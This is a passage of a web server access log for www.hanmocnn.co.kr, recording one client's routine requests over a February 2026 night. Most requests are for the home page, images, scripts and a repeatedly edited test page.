www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9736] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:00:45:17 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:45:17 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:45:17 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:00:45:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17647] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:01:07:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:07:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test" -[16/Feb/2026:01:07:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/test.html" [Client 222.117.41.51] [Length 297] [Gzip 1.64] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:07:57 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test.html" -[16/Feb/2026:01:07:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/assets/css/styles.css" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test.html" -[16/Feb/2026:01:08:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/test.html" [Client 222.117.41.51] [Length 338] [Gzip 1.67] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:08:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/assets/css/styles.css" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test.html" -[16/Feb/2026:01:10:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/test.html" [Client 222.117.41.51] [Length 361] [Gzip 1.67] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:10:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17647] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test.html" -[16/Feb/2026:01:10:24 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/assets/css/styles.css" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test.html" -[16/Feb/2026:01:10:24 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test.html" -[16/Feb/2026:01:11:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/test.html" [Client 222.117.41.51] [Length 366] [Gzip 1.67] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:11:07 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/assets/css/styles.css" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test.html" -[16/Feb/2026:01:11:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17647] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test.html" -[16/Feb/2026:01:11:07 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test.html" -[16/Feb/2026:01:11:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/test.html" [Client 222.117.41.51] [Length 369] [Gzip 1.68] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:11:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/assets/css/styles.css" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test.html" -[16/Feb/2026:01:11:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17647] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test.html" -[16/Feb/2026:01:11:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test.html" -[16/Feb/2026:01:12:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/test.html" [Client 222.117.41.51] [Length 381] [Gzip 1.85] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:12:46 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/assets/css/styles.css" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test.html" -[16/Feb/2026:01:13:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/test.html" [Client 222.117.41.51] [Length 380] [Gzip 2.00] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:13:43 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/assets/css/styles.css" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test.html" -[16/Feb/2026:01:14:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/test.html" [Client 222.117.41.51] [Length 403] [Gzip 1.98] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:14:53 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test.html" -[16/Feb/2026:01:14:53 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/assets/css/styles.css" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test.html" -[16/Feb/2026:01:14:56 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/test.html" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:14:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/assets/css/styles.css" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test.html" -[16/Feb/2026:01:14:58 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/test.html" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:14:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/assets/css/styles.css" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test.html" -[16/Feb/2026:01:15:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/test.html" [Client 222.117.41.51] [Length 394] [Gzip 1.97] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:15:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/assets/css/styles.css" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test.html" -[16/Feb/2026:01:16:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/test.html" [Client 222.117.41.51] [Length 403] [Gzip 2.03] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:16:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/assets/css/styles.css" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test.html" -[16/Feb/2026:01:16:51 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:16:51 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:16:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:16:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:16:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test" -[16/Feb/2026:01:17:01 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:17:05 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:17:32 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/test.html" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:17:32 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/assets/css/styles.css" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test.html" -[16/Feb/2026:01:18:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/test.html" [Client 222.117.41.51] [Length 498] [Gzip 2.00] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:18:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/assets/css/styles.css" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test.html" -[16/Feb/2026:01:18:59 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test.html" -[16/Feb/2026:01:18:59 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test.html" -[16/Feb/2026:01:38:17 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test1.html" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:38:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/test0.html" [Client 222.117.41.51] [Length 378] [Gzip 1.51] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:38:29 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test0.html" -[16/Feb/2026:02:13:56 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:13:56 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:02:13:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:02:13:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:02:13:56 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:02:13:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:02:13:56 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:02:13:56 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:03:24:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/test.html" [Client 222.117.41.51] [Length 498] [Gzip 2.00] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:03:24:53 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/assets/css/styles.css" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test.html" -[16/Feb/2026:03:24:53 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test.html" -[16/Feb/2026:03:24:53 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test.html" -[16/Feb/2026:03:24:53 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test.html" -[16/Feb/2026:03:25:03 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:03:25:03 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:03:25:03 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:03:25:03 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:03:25:03 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:16:36 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test.html" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:16:48 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:16:48 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:16:48 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:16:48 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:16:48 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:17:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9738] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:17:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:17:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr 